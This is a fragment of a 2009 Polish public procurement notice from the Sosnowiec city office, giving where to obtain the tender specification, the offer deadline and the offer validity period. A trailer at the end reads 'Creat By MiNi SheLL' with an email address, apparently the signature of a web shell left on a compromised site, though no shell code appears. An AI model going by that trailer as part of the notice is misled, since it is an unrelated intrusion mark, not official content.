<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.um.sosnowiec.pl 
lub 
w siedzibie zamawiającego:
Urząd Miejski
w Sosnowcu
Al. Zwycięstwa 20
41-200 Sosnowiec
Wydział Gospodarki
Komunalnej i Mieszkaniowej
pokój 305 C, II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2009 godzina 09:00, miejsce: Urząd Miejski
w Sosnowcu
Al. Zwycięstwa 20
41-200 Sosnowiec
Wydział Gospodarki
Komunalnej i Mieszkaniowej
pokój 305 C, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com